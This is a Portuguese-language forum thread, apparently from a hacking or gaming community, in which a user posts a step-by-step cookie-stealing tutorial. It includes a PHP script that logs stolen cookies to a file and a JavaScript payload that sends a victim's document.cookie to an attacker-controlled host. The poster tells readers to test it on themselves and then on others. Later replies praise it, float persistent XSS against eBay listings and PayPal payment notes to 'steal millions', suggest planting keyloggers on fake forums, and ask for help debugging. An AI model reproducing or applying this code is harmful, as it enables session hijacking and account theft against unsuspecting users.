ɓʀuɳѳ' ИИ#92 350 Posted February 9, 2013 Boa tarde..1- Registrem-se neste website http://www.000webhost.com2- No teu site faz o upload dos ficheiros abaixo..3- Cria um " steal.php " = pagina php 4- Código php para meter no steal.php: <?php$cookie = $_GET['cookie'];$log = fopen("log.txt", "a");fwrite($log, $cookie ."\n");fclose($log);header( 'Location: http://www.google.com' ) ;?>Substitui o http://www.google.com por algo mais engraçado .. Porque vão ser redirecionados..5- cria um ficheiro de texto com o nome log.txt e deixa em branco 6- Agora criam um html " qualquernome.html " e copias este codigo : <html><body><script>document.location = 'http://yourwebsite.com/steal.php?cookie=' + document.cookie;</script></body></html>7- Faz o upload para o teu site e envia o site para a vitima, no momento em que ela clica no " steal.php " os cookies serão guardados no " log.txt " 8- Testa primeiro em ti e depois tenta em outras pessoas ..Espero que tenham gostado e relembro :Lembrando que os conteúdos postados são apenas para fins educacionais com apenas o intuito de ensinar como funciona Cyber-gamers não aconselha não orienta e nem incentiva seus usuários,e que todas as informações discutidas NO FÓRUM são somente a nível de conhecimentoNOSSO CONHECIMENTO NAO É CRIME MAS SEUS ATOS PODEM SER 4 ThatGuyPT, xXBoyDarkXx, Strimblaster and 1 other reacted to this Share this post Link to post Share on other sites
xXBoyDarkXx 328 Posted February 9, 2013 woooooooooooooooooow :ooooooooooooooooooooooooooooooooooooooooooooooo Share this post Link to post Share on other sites
ɓʀuɳѳ' ИИ#92 350 Posted February 10, 2013 <html><body><script>document.location = 'http://yourwebsite.com/steal.php?cookie=' + document.cookie;</script></body></html> - Atenção que ali onde tem "http://yourwebsite.com" substituem pelo vosso site .. Share this post Link to post Share on other sites
Cєятєzαร 167 Posted February 12, 2013 O que faz, isso ? :) (Sorry pela ignorancia) Share this post Link to post Share on other sites
ɓʀuɳѳ' ИИ#92 350 Posted February 12, 2013 O que faz, isso ? :) (Sorry pela ignorancia) - Captura os cookies da vitima, poderás assim descobrir contas de qualquer tipo c: Cumprimentos Share this post Link to post Share on other sites
froyd 0 Posted June 5, 2014 NUNCA VI TUTORIAL MAIS FODA QUE ESSE NA NET , SE EU PUDESSE TIDAR UM BEIJO , EU TIDAVA ._. VLW MANO TAVA DOIDO ATRAZ DISSO E ESSE CONTEUDO DIRETO E FUNCIONAL SALVOU MINHA VIDA !!! Share this post Link to post Share on other sites
ThatGuyPT 457 Posted June 5, 2014 Lol. Isso com persistent XSS. Top Share this post Link to post Share on other sites
.тιαgσ 624 Posted June 5, 2014 Eu não percebo nada disto não é, mas eu acho que a maior parte das pessoas não usa cookies em site de pagamentos e os outros sites são useless, yah e tal pode-se roubar contas de jogos e tal, mas eu digo para quê? Não era mais fácil criar um fórum tipo de downloads e assim para chamar pessoal, com registo e põe-se lá um keylogger no login para o caso das senhas serem codificadas? Edit: Ou até num jogo browser Share this post Link to post Share on other sites
ThatGuyPT 457 Posted June 5, 2014 Sure, metes as passwords em Plain TextMas tem outra utilidade eu criar por exemplo uma venda no eBay com persistent XSS para roubar. Cookies she la forem. Ou um persistent XSS nas notas do pagamento de PayPal. Podes roubar milhões só assim e ainda há semanas foram descobertos persistent xss no eBay ou ha pouco mais no PayPal.Também ha um serviço de streaming que tem uma vuln XSS que se julga ser um honeypot para os feds. Share this post Link to post Share on other sites
.тιαgσ 624 Posted June 5, 2014 Sure, metes as passwords em Plain TextMas tem outra utilidade eu criar por exemplo uma venda no eBay com persistent XSS para roubar. Cookies she la forem. Ou um persistent XSS nas notas do pagamento de PayPal. Podes roubar milhões só assim e ainda há semanas foram descobertos persistent xss no eBay ou ha pouco mais no PayPal.Também ha um serviço de streaming que tem uma vuln XSS que se julga ser um honeypot para os feds. Que serviço é esse para eu não usar Share this post Link to post Share on other sites
ThatGuyPT 457 Posted June 5, 2014 Não vou referir porque Como disse é um honeypot para os feds. Share this post Link to post Share on other sites
Strimblaster 273 Posted June 5, 2014 me gusta muhahahahha :D thanks Share this post Link to post Share on other sites
Sant0s 422 Posted June 9, 2014 Acho que fiz tudo bem, mas tipo quando clicam no site vão para a pagina que eu escolhi nesta caso youtube mas eu só recebo 1 byte no log. E está sempre em branco. Alguém sabe resolver isto *_* ou eu fiz mal? Share this post Link to post Share on other sites
Bryan 2 Posted January 23, 2015 Acho que fiz tudo bem, mas tipo quando clicam no site vão para a pagina que eu escolhi nesta caso youtube mas eu só recebo 1 byte no log. E está sempre em branco. Alguém sabe resolver isto *_* ou eu fiz mal? Estou com o mesmo problema! se alguém nos ajudar ficariamos grato. Share this post Link to post Share on other sites